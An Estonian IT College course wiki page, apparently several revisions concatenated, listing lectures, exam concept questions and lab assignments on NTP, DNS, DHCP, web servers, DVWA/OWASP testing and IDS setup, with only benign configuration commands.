[http://enos.itcollege.ee/~mernits/skriptimine/bash/src/juurteenused-ntp.html NTP teenus] (Päevaõppes toimus 02.02.2015)

[https://www.us-cert.gov/ncas/alerts/TA14-013A NTP amplification Attack]

Kodutöö nr 1. Tähtaeg 9.02.2015. DNS loenguks lugeda läbi DNS põhimõisted järgnevatest materjalidest:

Kohustuslik:
http://kuutorvaja.eenet.ee/wiki/DNS_ja_BIND

Soovituslik:
http://kuutorvaja.eenet.ee/wiki/DNS

[http://enos.itcollege.ee/~mernits/infrastruktuur/Interneti%20domeeninimede%20s%c3%bcsteem%20-%20IT%20infra%20loeng.odp DNS loeng (OpenDocument)] [http://enos.itcollege.ee/~mernits/infrastruktuur/Interneti%20domeeninimede%20s%c3%bcsteem%20-%20IT%20infra%20loeng.pdf (PDF)]

[http://elab.itcollege.ee:8000/infra/bind/ BIND9 konfiguratsiooni näitefailid]

[https://docs.google.com/document/d/1ZeQpPXdVq1C7RQpxQYR0gBB0OBMYB_0g6aFFxs_-fIA/edit DNS näide]

[http://enos.itcollege.ee/~mernits/infrastruktuur/Infra%20loeng%20DHCP%202013.odp DHCP loeng]

[https://docs.google.com/document/d/1yUEWHldPhIbeVRh3k-zmwEg1OJmIGywMKVZY4XslpDY/edit# DHCP näitelabor]

[https://docs.google.com/document/d/14Cj90aWN4n4MCO_zZlZzu0aHJeIDTPEfQgiDXIuMxF4/edit# DNS uuendamine DHCP abil]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng04%20-%20Veebiserver.odp Veebiserveri loeng]

Screencast veebiserveri konfigureerimisest:

http://elab.itcollege.ee:8000/veebiserver/out-1.ogv

http://elab.itcollege.ee:8000/veebiserver/out-2.ogv

http://elab.itcollege.ee:8000/veebiserver/out-3.ogv

Kodutöö nr 2. Tähtaeg 20.aprill.2015. Lugeda läbi [http://owasptop10.googlecode.com/files/OWASP%20Top%2010%20-%202013%20-%20RC1.pdf OWASP top 10 2013] 

=Mõisted kontrolltööks ja arvestuseks=

'''Esimese kontrolltöö küsimused:'''

*DNS mõistete kohta leiab infot: http://kuutorvaja.eenet.ee/wiki/DNS
*hostinimi (mis märgid on hostinimes lubatud ja kus?)
*host täisnimi
*domeeni täisnimi
*DNS
*A-kirje
*alias ehk CNAME
*puhverdamine
*dig ja selle kasutamine
*DNS spoofing
*domeen ja domeeninimi
*Authoritative ehk pädev server
*Forwarding ehk edastamine
*FQDN
*Host
*PTR-kirje
*rekursiivne lahendus
*primaarne server
*sekundaarne server
*open resolver
*kuidas nimelahendus töötab, kirjelda näiteks "kui veebisirvijas avatakse leht, siis mis võiks toimuda?"
*selgitage näitekonfi
<pre>
$TTL 600
@ IN SOA planet.zz. root.planet.zz. (
3 ; Serial - Mida see tähendab?
3600 ; Refresh - Mida see tähendab?
8640 ; Retry - Mida see tähendab?
36000 ; Expire - Mida see tähendab?
3600 ) ; Negative Cache TTL - Mida see tähendab?
;

</pre>

'''Teise kontrolltöö küsimused:'''

*virtuaalhost
*http
*Kuidas toimub ssl/tls ühenduse algatamine?
*Mis vahe on sümmeetrilisel ja asümmeetrilisel krüpteerimisel?
*Mis vahe on avalikul võtmel ja sertifikaadil?
*https
*SNI
*IPS
*IDS
*Mis vahe on reflected XSS ja stored XSS rünnetel?
*Mis vahe on SQL injectionil ja blind SQL injectionil?
*Mis on secure cookie? (http://php.net/session.cookie-secure ;session.cookie_secure =)
*Mis tähendab, et küpsised on http_only?
*Kas XSS ründeid saab filtreerida andmebaasikihis, näiteks SQL tulemüüriga?
*Mis on CSRF ja kuidas see toimib?
*Mis on same origin policy?

=Dokumentatsioon=

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng05%20-%20Dokumentatsioon.odp Dokumentatsioonist (loeng)]

[http://enos.itcollege.ee/~mernits/infrastruktuur/Aruannete%20hindamise%20juhend.pdf Hindamismaatriksi näide]

== Teemad 2015 ==

[[SQL tulemüürid]] -- Otsida erinevaid SQL tulemüüre ja kirjata nende põhiparameerid

[[sqlmap]]

[[p0f]] http://tools.kali.org/information-gathering/p0f

[[hping]] http://www.hping.org/

[[Yersinia]] - http://www.yersinia.net/

[[WPScan]] - http://wpscan.org/

=Abimaterjal=
* [http://tools.ietf.org/html/rfc2131 RFC2131]
* [http://kuutorvaja.eenet.ee/wiki/Isc-dhcpd_server Kuutõrvaja DHCP materjal]

Abimaterjal laboriks:
* Maskeraad [[Ufw]]
* DHCP serveri seadistamine [[DHCP]]
* [http://www.debian-administration.org/article/343/Configuring_Dynamic_DNS__DHCP_on_Debian_Stable Dünaamiline DNS kirjete uuendamine DHCP poolt]
* [http://debianclusters.org/index.php/Troubleshooting_DHCP DHCP probleemide lahendamine]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng11%20-%20Monitooring.odp Loeng 11 Monitooring]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng12%20-%20LDAP.odp Loeng 12 LDAP]

=Praktilised tööd=

[https://docs.google.com/spreadsheets/d/1TiErlKTrnW3T_dcjceMyeLr9yCHBDwTmjXDxkAf1hDw/edit?usp=sharing Nimekiri] DNS labori masinate IP vahemikega ning domeeninimedega

==Sissejuhatav praktikum==

Valige endale domeeninimi, näiteks eikkasutaja.zz.

Seadke DNS serverile IP aadress 192.168.56.201
<source lang="bash">
nano /etc/network/interfaces # Avab võrguliideste faili.
# DNS serveri eth1 võrguliidesel tuleb muuta esialgne IP-address 192.168.56.200 uueks IP-addressiks 192.168.56.201
auto eth1
iface eth1 inet static
address 192.168.56.201
netmask 255.255.255.0
</source>

Taaskäivitage võrguliides '''eth1'''
<source lang="bash">
ifdown eth1 && ifup eth1
</source>

Muutke DNS serveril hostinimi ns.sinudomeen.
<source lang="bash">
echo ns > /etc/hostname
</source>
Muutke /etc/hosts failis masinanimi

127.0.1.1 ns.sinudomeen ns

Näiteks valisin oma domeeniks mernits.zz

127.0.1.1 ns.mernits.zz ns

startige teenus '''hostname'''
<source lang="bash">
service hostname start
</source>

Korraldus hostname -f peab tagastama FQDN-i
<source lang="bash">
hostname -f
</source>

Seadistage ka võtmetepõhine autentimine [[OpenSSH: võtmetega autentimine]]

[[Image:Infra-a21-2015.png|thumb|Kasutatav võrk]]

==Labor 1 - NTP seadistamine (6p/6%)==
Loe läbi õppematerjal (loengud) ja seadista NTP teenus nii kliendis, kui ka serveris selliselt, et klient küsib aega ainult serverist (ja ka localhostist, mille prioriteet on madal e fudge 10) Server küsib aega EENET NTP serverist ja mõnest muust Eestis asuvast NTP serverist.

Seadistage server selliselt, et ei välisvõrgust ei saa teha järgmisel lingil kirjeldatud rünnet https://www.us-cert.gov/ncas/alerts/TA14-013A

[[NTP Ubuntus]]

==Labor 2 - DNS seadistamine (6p/6%)==

*Mõtle välja endale domeeninimi
*Loo domeeninimele tsoonifail ja seadiste nimeserver
*Luba rekursiivne lahendus oma sisevõrgust
*Loo reevers tsoon
*Loo A kirjed e-posti, nimeserveri jaoks
*Loo CNAME kirjed www, samba ja oma severi jaoks

Näitelahendus [https://docs.google.com/document/d/1ZeQpPXdVq1C7RQpxQYR0gBB0OBMYB_0g6aFFxs_-fIA/edit Domain Name Server ehk nimeserveri labor]

Näitelahendus2 [[Nimeserveri labor V.2]]

[http://enos.itcollege.ee/~mernits/infrastruktuur/dns/DNS_BIND.html Väike abiinfo lisaks loengule]

Kaitsmisel pead oskama luua uut tsooni, lisama kirjeid, oskama kasutada rndc, dig, nslookup vahendeid.

==Labor 3 - DHCP seadistamine (6p/6%)==
* DHCP paigaldamine ja seadistamine (6p)

Seadista labori desktop VM saamaks IP aadressi ja nimeserverit sama labori serveri VM käest.

PS: desktop võrguseadetest eemalda esimeselt liideselt nimelahenduse küsimine (küsitakse DHCP abil ainult IP aadress). Kui seda ei tee, siis lähevad DNS päringud ikkagi esimese, NAT liidese kaudu.

[https://docs.google.com/document/d/1yUEWHldPhIbeVRh3k-zmwEg1OJmIGywMKVZY4XslpDY/edit DHCP näitelabor]

==Labor 4 - apache (või nginx) veebiserveri seadistamine (6p/6%)==
* Loo kaks virtualhosti nii http, kui ka https (self-signed cert) tarbeks.
** Mõlemad nimied peavad sirvijas töötama (desktop arvutis) nii http, kui ka https abil ja esilehel peab olema selgelt näha kumma virutalhostiga on tegemist. Seega index.html sisse lisa virtualhosti nimi.

* Abimaterjalina võib sobida: Apache2 paigaldamine ja virtualhostide seadistamine [[Virtualhost apache2 näitel]]. Algajale lisamaterjal [[Veebiserveri labor v.2]]

==Labor 5 - mõne veebirakenduse (nt Wordpress) paigaldamine ja turvamine varnishiga (10p/10%)==

Labori eesmärgiks on paigaldada veebirakendus, mõõta selle jõudlust ja seejärel suurendada veebirakenduse jõudlust kasutades puhvermälu. Veebirakenduse ja puhvermälu võib iga tudeng ise valida. Näite teeme WordPress ja WP SuperCace abil. Samas on väga soovitatav valida cache tehnoloogia ise, et erinevad inimesed saaksid võrrelda erinevaid asju.

* Wordpress paigaldamine https://docs.google.com/document/d/1AKVigVudVjxQuCz02i6p4Kv8oO4RD6aJiV9pbPuujZY/edit?pli=1

* Wordpress paigaldamine ja jõudluse testimine (varnish)
[[WordPress turvamine]]

http://wpdevshed.com/top-cache-plugins-wordpress/

[[Varnish]] - vaata http://www.howtoforge.com/putting-varnish-in-front-of-apache-on-ubuntu-debian
[[Apache logide seadistus]]

==Labor 6 - DVWA paigaldamine ja OWASP testimine (10p/10%)==

Paigaldage DVWA: https://wiki.itcollege.ee/index.php/DVWA

Loe läbi OWASP top 10 ja [http://enos.itcollege.ee/~ttanav/VRI/abiks/mysql_tut.php SQL põhitõed]

Mõned videod:

* https://www.youtube.com/watch?v=CDbWvEwBBxo

==Labor 7 - rakenduste tulemüürid (greensql ja mod_security baasil) (10p/10%)==

==Labor 8 - IDS (10p/10%)==

Seadistada IDS/IPS ühele oma valitud serverile ja demonstreeida ühe-kahe reegli toimimist.

Juhend: https://wiki.itcollege.ee/index.php/IDS_Systeemid_-_Labor_1

Abistav materjal: https://wiki.itcollege.ee/index.php/Suricata

==Questid, millede eest saab punkte==

Quest 1 (Läbi ja tehtud) - https://docs.google.com/document/d/1oRt9JLF6lcf_Z-ReHCfbZXnSoc-EOBzGprxvIyhq4qk/edit?usp=sharing

=Esitatud referaadid=
[[IT infrastruktuuri teenused 2013 kevad]]

[[Wordpressi turvalisuse suurendamine]]

=Juurteenuste kursus=
[http://enos.itcollege.ee/~mernits/skriptimine/bash/src/juurteenused.html Interneti juurteenused]

=Täiendav lugemismaterjal=
[https://zib.wooop.biz/category/asd/ Erinevad juhendmaterjalid Linuxi teenuste jm seadistamiseks. Autor Gert Vaikre A21]

=Vanad loengumaterjalid=

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng00%20-%20Sissejuhatav%20loeng.odp Loeng 00 - Sissejuhatav loeng - NB Tähtajad ja nõuded]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng01%20-%20E-post.odp Loeng 01 E-post]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng03%20-%20Failiserver.odp Loeng 03 Failiserver]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng04%20-%20Veebiserver.odp Loeng 04 Veebiserver]

[http://goo.gl/6XQ0U WordPress seadistamine]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng05%20-%20Dokumentatsioon.odp Loeng 05 Dokumentatsioon]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng06%20-%20VPN.odp Loeng 06 VPN]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng07%20-%20iptables.odp Loeng 07 Tulemüürid]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng08%20-%20SAN%20-%20NAS%20-%20CAS.odp Loeng 08 SAN NAS CAS]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng09%20-%20Virtualiseerimine.odp Loeng 09 Virtualiseerimine]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng10%20-%20DHCP.odp Loeng 10 DHCP]

Category:I375/I803/I853 IT Infrastructure services

2015-05-11T10:28:31Z

Mernits: /* Teemad 2015 */

=Üldinfo=
Aine info: [https://itcollege.ois.ee/study-material/round?round_id=2230 IT infrastruktuuri teenused ÕIS leht]

[http://enos.itcollege.ee/~mernits/infrastruktuur/ Aine õppematerjalid]

ECTS: 5

Hindamisviis: Arvestus

'''Rangelt soovituslik aine:''' Operatsioonisüsteemide administreerimine ja sidumine (I233)

==Õppejõud==
Margus Ernits >> margus (.) ernits (ät) itcollege (.) ee

Katrin Loodus >> katrin (.) loodus (ät) itcollege (.) ee

=Eesmärk ja sisu=
Tutvustada IT infrastruktuuri teenuste põhimõisteid. Anda oskused põhiliste teenuste paigaldamiseks ja turvamiseks. Anda oskused IT infrastruktuuri teenuste dokumenteerimiseks.
Eesmärgi saavutamiseks toimuvad laboratoorsed tööd, mille käigus installeeritakse ja konfigureeritakse teenuseid pöörates rõhku teenuse turvalisusele, millele eelnevad loengud alus- ja põhimõistete tutvustamiseks.

=Ainekaart=
Ainekaardi viimase, kuid mitte lõpliku versiooni leiab [https://wiki.itcollege.ee/images/6/67/I385_IT_infrastruktuuri_teenused_aineprogramm_2013.odt siit]

=Eelmiste aastate tagasiside=
[https://wiki.itcollege.ee/images/e/e3/Tagasiside.p%C3%A4eva%C3%B5pe-2013.pdf 2013 kaugõppe tagasiside]

[https://wiki.itcollege.ee/images/4/4d/It-infra-tagasiside-2012-1.pdf 2012 kaugõppe tagasiside]

[https://wiki.itcollege.ee/images/2/28/It-infra-tagasiside-2012-2.pdf 2012 päevaõppe tagasiside]

=Arvestus ja hindamine=

Aine on jagatud praktilisteks ja teoreetilisteks töödeks. Kaheksaks (8) laboriks ning kaheks (2) teoreetiliseks kontrolltööks.

Lisaks on tarvis teha eraldi dokumentatsiooni ehk ühe kaitstud labori kohta '''viki artikkel'''.

'''Praktiliste tööde''' hulka kuuluvad erinevate teenuste paigaldamine ning seadistamine. Ühe labori eest on võimalik saada maksimaalselt 6 punkti.

* 2 punkt on võimalik saada teenuse seadistamise, paigaldamise ning suulise kaitsmise eest. (Õppejõud võib seadistust muuta ning paluda paranduste kohta selgitust)
* 4 punkti on võimalik saada, kui kaitsta oskuslikult konkreetse labori kohta käivad teoreetilised teadmised suuliselt õppejõule. (Küsimused esitab õppejõud)
* 6 punkti on võimalik saada, kui parandada konkreetse teema kohta käivat juhendit ning esitada tulemuse õppejõule. (Mõeldud ambitsioonikamatele tudengitele)

Lävendiks on 2 punkt, mis tähendab praktilise osa teostust. Kui iga labori eest on ainult 2 punkt, tuleb teoreetilised teadmised kaitsta kontrolltöö käigus, aga kui iga labori eest on vähemalt 4 punkti, ei ole kontrolltööd tarvis teha.

==Tähtajad päevaõppele 2015==

Praktilise töö laborite kaitsmised (laborid 1-3): 16. märts

Praktilise töö laborite kaitsmised (Laborid 4-6): 18. mai

Praktilise töö labori kaitsmised (Labor 8): ~20. mai

Dokumentatsioon (viki artikkel): 25. mai

Kontrolltöö 1: 16. märts

Kontrolltöö 2: 18. mai

==Tähtajad kaugõppele 2015==

Praktilise töö laborite kaitsmised (laborid 1-3):

Praktilise töö laborite kaitsmised (Laborid 4-6):

Praktilise töö labori kaitsmised (Labor 8):

Dokumentatsioon (viki artikkel):

Kontrolltöö 1:

Kontrolltöö 2:

=Loengud=

'''Kaugõppe 2015. aasta kevadsemestri loengusalvestused on leitavad [https://echo360.e-ope.ee/ess/portal/section/57596897-5ba5-46cb-b1b2-b4a4619f5eb0 siit]'''

[http://enos.itcollege.ee/~mernits/infrastruktuur/loeng00%20-%20Sissejuhatav%20loeng.odp Sissejuhatav loeng] - NB siin on kirjas hindamiskriteeriumid ja tähtajad. Lisaks on kirjas kontrolltööde ajad ja muu aine läbimiseks oluline info. (Päevaõppes toimus 02.02.2014)

[http://enos.itcollege.ee/~mernits/skriptimine/bash/src/juurteenused-ntp.html NTP teenus] (Päevaõppes toimus 02.02.2015)

[https://www.us-cert.gov/ncas/alerts/TA14-013A NTP amplification Attack]

Kodutöö nr 1. Tähtaeg 9.02.2015. DNS loenguks lugeda läbi DNS põhimõisted järgnevatest materjalidest:

Kohustuslik:
http://kuutorvaja.eenet.ee/wiki/DNS_ja_BIND

Soovituslik:
http://kuutorvaja.eenet.ee/wiki/DNS

[http://enos.itcollege.ee/~mernits/infrastruktuur/Interneti%20domeeninimede%20s%c3%bcsteem%20-%20IT%20infra%20loeng.odp DNS loeng (OpenDocument)] [http://enos.itcollege.ee/~mernits/infrastruktuur/Interneti%20domeeninimede%20s%c3%bcsteem%20-%20IT%20infra%20loeng.pdf (PDF)]

[http://elab.itcollege.ee:8000/infra/bind/ BIND9 konfiguratsiooni näitefailid]

[https://docs.google.com/document/d/1ZeQpPXdVq1C7RQpxQYR0gBB0OBMYB_0g6aFFxs_-fIA/edit DNS näide]

[http://enos.itcollege.ee/~mernits/infrastruktuur/Infra%20loeng%20DHCP%202013.odp DHCP loeng]

[https://docs.google.com/document/d/1yUEWHldPhIbeVRh3k-zmwEg1OJmIGywMKVZY4XslpDY/edit# DHCP näitelabor]

[https://docs.google.com/document/d/14Cj90aWN4n4MCO_zZlZzu0aHJeIDTPEfQgiDXIuMxF4/edit# DNS uuendamine DHCP abil]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng04%20-%20Veebiserver.odp Veebiserveri loeng]

Screencast veebiserveri konfigureerimisest:

http://elab.itcollege.ee:8000/veebiserver/out-1.ogv

http://elab.itcollege.ee:8000/veebiserver/out-2.ogv

http://elab.itcollege.ee:8000/veebiserver/out-3.ogv

Kodutöö nr 2. Tähtaeg 20.aprill.2015. Lugeda läbi [http://owasptop10.googlecode.com/files/OWASP%20Top%2010%20-%202013%20-%20RC1.pdf OWASP top 10 2013] 

=Mõisted kontrolltööks ja arvestuseks=

'''Esimese kontrolltöö küsimused:'''

*DNS mõistete kohta leiab infot: http://kuutorvaja.eenet.ee/wiki/DNS
*hostinimi (mis märgid on hostinimes lubatud ja kus?)
*host täisnimi
*domeeni täisnimi
*DNS
*A-kirje
*alias ehk CNAME
*puhverdamine
*dig ja selle kasutamine
*DNS spoofing
*domeen ja domeeninimi
*Authoritative ehk pädev server
*Forwarding ehk edastamine
*FQDN
*Host
*PTR-kirje
*rekursiivne lahendus
*primaarne server
*sekundaarne server
*open resolver
*kuidas nimelahendus töötab, kirjelda näiteks "kui veebisirvijas avatakse leht, siis mis võiks toimuda?"
*selgitage näitekonfi
<pre>
$TTL 600
@ IN SOA planet.zz. root.planet.zz. (
3 ; Serial - Mida see tähendab?
3600 ; Refresh - Mida see tähendab?
8640 ; Retry - Mida see tähendab?
36000 ; Expire - Mida see tähendab?
3600 ) ; Negative Cache TTL - Mida see tähendab?
;

</pre>

'''Teise kontrolltöö küsimused:'''

*virtuaalhost
*http
*Kuidas toimub ssl/tls ühenduse algatamine?
*Mis vahe on sümmeetrilisel ja asümmeetrilisel krüpteerimisel?
*Mis vahe on avalikul võtmel ja sertifikaadil?
*https
*SNI
*IPS
*IDS
*Mis vahe on reflected XSS ja stored XSS rünnetel?
*Mis vahe on SQL injectionil ja blind SQL injectionil?
*Mis on secure cookie? (http://php.net/session.cookie-secure ;session.cookie_secure =)
*Mis tähendab, et küpsised on http_only?
*Kas XSS ründeid saab filtreerida andmebaasikihis, näiteks SQL tulemüüriga?
*Mis on CSRF ja kuidas see toimib?
*Mis on same origin policy?

=Dokumentatsioon=

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng05%20-%20Dokumentatsioon.odp Dokumentatsioonist (loeng)]

[http://enos.itcollege.ee/~mernits/infrastruktuur/Aruannete%20hindamise%20juhend.pdf Hindamismaatriksi näide]

== Teemad 2015 ==

[[SQL tulemüürid]] -- Otsida erinevaid SQL tulemüüre ja kirjata nende põhiparameerid

[[sqlmap]]

[[p0f]] http://tools.kali.org/information-gathering/p0f

[[hping]] http://www.hping.org/

[[Yersinia]] - http://www.yersinia.net/

=Abimaterjal=
* [http://tools.ietf.org/html/rfc2131 RFC2131]
* [http://kuutorvaja.eenet.ee/wiki/Isc-dhcpd_server Kuutõrvaja DHCP materjal]

Abimaterjal laboriks:
* Maskeraad [[Ufw]]
* DHCP serveri seadistamine [[DHCP]]
* [http://www.debian-administration.org/article/343/Configuring_Dynamic_DNS__DHCP_on_Debian_Stable Dünaamiline DNS kirjete uuendamine DHCP poolt]
* [http://debianclusters.org/index.php/Troubleshooting_DHCP DHCP probleemide lahendamine]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng11%20-%20Monitooring.odp Loeng 11 Monitooring]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng12%20-%20LDAP.odp Loeng 12 LDAP]

=Praktilised tööd=

[https://docs.google.com/spreadsheets/d/1TiErlKTrnW3T_dcjceMyeLr9yCHBDwTmjXDxkAf1hDw/edit?usp=sharing Nimekiri] DNS labori masinate IP vahemikega ning domeeninimedega

==Sissejuhatav praktikum==

Valige endale domeeninimi, näiteks eikkasutaja.zz.

Seadke DNS serverile IP aadress 192.168.56.201
<source lang="bash">
nano /etc/network/interfaces # Avab võrguliideste faili.
# DNS serveri eth1 võrguliidesel tuleb muuta esialgne IP-address 192.168.56.200 uueks IP-addressiks 192.168.56.201
auto eth1
iface eth1 inet static
address 192.168.56.201
netmask 255.255.255.0
</source>

Taaskäivitage võrguliides '''eth1'''
<source lang="bash">
ifdown eth1 && ifup eth1
</source>

Muutke DNS serveril hostinimi ns.sinudomeen.
<source lang="bash">
echo ns > /etc/hostname
</source>
Muutke /etc/hosts failis masinanimi

127.0.1.1 ns.sinudomeen ns

Näiteks valisin oma domeeniks mernits.zz

127.0.1.1 ns.mernits.zz ns

startige teenus '''hostname'''
<source lang="bash">
service hostname start
</source>

Korraldus hostname -f peab tagastama FQDN-i
<source lang="bash">
hostname -f
</source>

Seadistage ka võtmetepõhine autentimine [[OpenSSH: võtmetega autentimine]]

[[Image:Infra-a21-2015.png|thumb|Kasutatav võrk]]

==Labor 1 - NTP seadistamine (6p/6%)==
Loe läbi õppematerjal (loengud) ja seadista NTP teenus nii kliendis, kui ka serveris selliselt, et klient küsib aega ainult serverist (ja ka localhostist, mille prioriteet on madal e fudge 10) Server küsib aega EENET NTP serverist ja mõnest muust Eestis asuvast NTP serverist.

Seadistage server selliselt, et ei välisvõrgust ei saa teha järgmisel lingil kirjeldatud rünnet https://www.us-cert.gov/ncas/alerts/TA14-013A

[[NTP Ubuntus]]

==Labor 2 - DNS seadistamine (6p/6%)==

*Mõtle välja endale domeeninimi
*Loo domeeninimele tsoonifail ja seadiste nimeserver
*Luba rekursiivne lahendus oma sisevõrgust
*Loo reevers tsoon
*Loo A kirjed e-posti, nimeserveri jaoks
*Loo CNAME kirjed www, samba ja oma severi jaoks

Näitelahendus [https://docs.google.com/document/d/1ZeQpPXdVq1C7RQpxQYR0gBB0OBMYB_0g6aFFxs_-fIA/edit Domain Name Server ehk nimeserveri labor]

Näitelahendus2 [[Nimeserveri labor V.2]]

[http://enos.itcollege.ee/~mernits/infrastruktuur/dns/DNS_BIND.html Väike abiinfo lisaks loengule]

Kaitsmisel pead oskama luua uut tsooni, lisama kirjeid, oskama kasutada rndc, dig, nslookup vahendeid.

==Labor 3 - DHCP seadistamine (6p/6%)==
* DHCP paigaldamine ja seadistamine (6p)

Seadista labori desktop VM saamaks IP aadressi ja nimeserverit sama labori serveri VM käest.

PS: desktop võrguseadetest eemalda esimeselt liideselt nimelahenduse küsimine (küsitakse DHCP abil ainult IP aadress). Kui seda ei tee, siis lähevad DNS päringud ikkagi esimese, NAT liidese kaudu.

[https://docs.google.com/document/d/1yUEWHldPhIbeVRh3k-zmwEg1OJmIGywMKVZY4XslpDY/edit DHCP näitelabor]

==Labor 4 - apache (või nginx) veebiserveri seadistamine (6p/6%)==
* Loo kaks virtualhosti nii http, kui ka https (self-signed cert) tarbeks.
** Mõlemad nimied peavad sirvijas töötama (desktop arvutis) nii http, kui ka https abil ja esilehel peab olema selgelt näha kumma virutalhostiga on tegemist. Seega index.html sisse lisa virtualhosti nimi.

* Abimaterjalina võib sobida: Apache2 paigaldamine ja virtualhostide seadistamine [[Virtualhost apache2 näitel]]. Algajale lisamaterjal [[Veebiserveri labor v.2]]

==Labor 5 - mõne veebirakenduse (nt Wordpress) paigaldamine ja turvamine varnishiga (10p/10%)==

Labori eesmärgiks on paigaldada veebirakendus, mõõta selle jõudlust ja seejärel suurendada veebirakenduse jõudlust kasutades puhvermälu. Veebirakenduse ja puhvermälu võib iga tudeng ise valida. Näite teeme WordPress ja WP SuperCace abil. Samas on väga soovitatav valida cache tehnoloogia ise, et erinevad inimesed saaksid võrrelda erinevaid asju.

* Wordpress paigaldamine https://docs.google.com/document/d/1AKVigVudVjxQuCz02i6p4Kv8oO4RD6aJiV9pbPuujZY/edit?pli=1

* Wordpress paigaldamine ja jõudluse testimine (varnish)
[[WordPress turvamine]]

http://wpdevshed.com/top-cache-plugins-wordpress/

[[Varnish]] - vaata http://www.howtoforge.com/putting-varnish-in-front-of-apache-on-ubuntu-debian
[[Apache logide seadistus]]

==Labor 6 - DVWA paigaldamine ja OWASP testimine (10p/10%)==

Paigaldage DVWA: https://wiki.itcollege.ee/index.php/DVWA

Loe läbi OWASP top 10 ja [http://enos.itcollege.ee/~ttanav/VRI/abiks/mysql_tut.php SQL põhitõed]

Mõned videod:

* https://www.youtube.com/watch?v=CDbWvEwBBxo

==Labor 7 - rakenduste tulemüürid (greensql ja mod_security baasil) (10p/10%)==

==Labor 8 - IDS (10p/10%)==

Seadistada IDS/IPS ühele oma valitud serverile ja demonstreeida ühe-kahe reegli toimimist.

Juhend: https://wiki.itcollege.ee/index.php/IDS_Systeemid_-_Labor_1

Abistav materjal: https://wiki.itcollege.ee/index.php/Suricata

==Questid, millede eest saab punkte==

Quest 1 (Läbi ja tehtud) - https://docs.google.com/document/d/1oRt9JLF6lcf_Z-ReHCfbZXnSoc-EOBzGprxvIyhq4qk/edit?usp=sharing

=Esitatud referaadid=
[[IT infrastruktuuri teenused 2013 kevad]]

[[Wordpressi turvalisuse suurendamine]]

=Juurteenuste kursus=
[http://enos.itcollege.ee/~mernits/skriptimine/bash/src/juurteenused.html Interneti juurteenused]

=Täiendav lugemismaterjal=
[https://zib.wooop.biz/category/asd/ Erinevad juhendmaterjalid Linuxi teenuste jm seadistamiseks. Autor Gert Vaikre A21]

=Vanad loengumaterjalid=

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng00%20-%20Sissejuhatav%20loeng.odp Loeng 00 - Sissejuhatav loeng - NB Tähtajad ja nõuded]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng01%20-%20E-post.odp Loeng 01 E-post]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng03%20-%20Failiserver.odp Loeng 03 Failiserver]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng04%20-%20Veebiserver.odp Loeng 04 Veebiserver]

[http://goo.gl/6XQ0U WordPress seadistamine]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng05%20-%20Dokumentatsioon.odp Loeng 05 Dokumentatsioon]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng06%20-%20VPN.odp Loeng 06 VPN]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng07%20-%20iptables.odp Loeng 07 Tulemüürid]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng08%20-%20SAN%20-%20NAS%20-%20CAS.odp Loeng 08 SAN NAS CAS]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng09%20-%20Virtualiseerimine.odp Loeng 09 Virtualiseerimine]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng10%20-%20DHCP.odp Loeng 10 DHCP]

Category:I375/I803/I853 IT Infrastructure services

2015-05-11T10:26:59Z

Mernits: /* Teemad 2015 */

=Üldinfo=
Aine info: [https://itcollege.ois.ee/study-material/round?round_id=2230 IT infrastruktuuri teenused ÕIS leht]

[http://enos.itcollege.ee/~mernits/infrastruktuur/ Aine õppematerjalid]

ECTS: 5

Hindamisviis: Arvestus

'''Rangelt soovituslik aine:''' Operatsioonisüsteemide administreerimine ja sidumine (I233)

==Õppejõud==
Margus Ernits >> margus (.) ernits (ät) itcollege (.) ee

Katrin Loodus >> katrin (.) loodus (ät) itcollege (.) ee

=Eesmärk ja sisu=
Tutvustada IT infrastruktuuri teenuste põhimõisteid. Anda oskused põhiliste teenuste paigaldamiseks ja turvamiseks. Anda oskused IT infrastruktuuri teenuste dokumenteerimiseks.
Eesmärgi saavutamiseks toimuvad laboratoorsed tööd, mille käigus installeeritakse ja konfigureeritakse teenuseid pöörates rõhku teenuse turvalisusele, millele eelnevad loengud alus- ja põhimõistete tutvustamiseks.

=Ainekaart=
Ainekaardi viimase, kuid mitte lõpliku versiooni leiab [https://wiki.itcollege.ee/images/6/67/I385_IT_infrastruktuuri_teenused_aineprogramm_2013.odt siit]

=Eelmiste aastate tagasiside=
[https://wiki.itcollege.ee/images/e/e3/Tagasiside.p%C3%A4eva%C3%B5pe-2013.pdf 2013 kaugõppe tagasiside]

[https://wiki.itcollege.ee/images/4/4d/It-infra-tagasiside-2012-1.pdf 2012 kaugõppe tagasiside]

[https://wiki.itcollege.ee/images/2/28/It-infra-tagasiside-2012-2.pdf 2012 päevaõppe tagasiside]

=Arvestus ja hindamine=

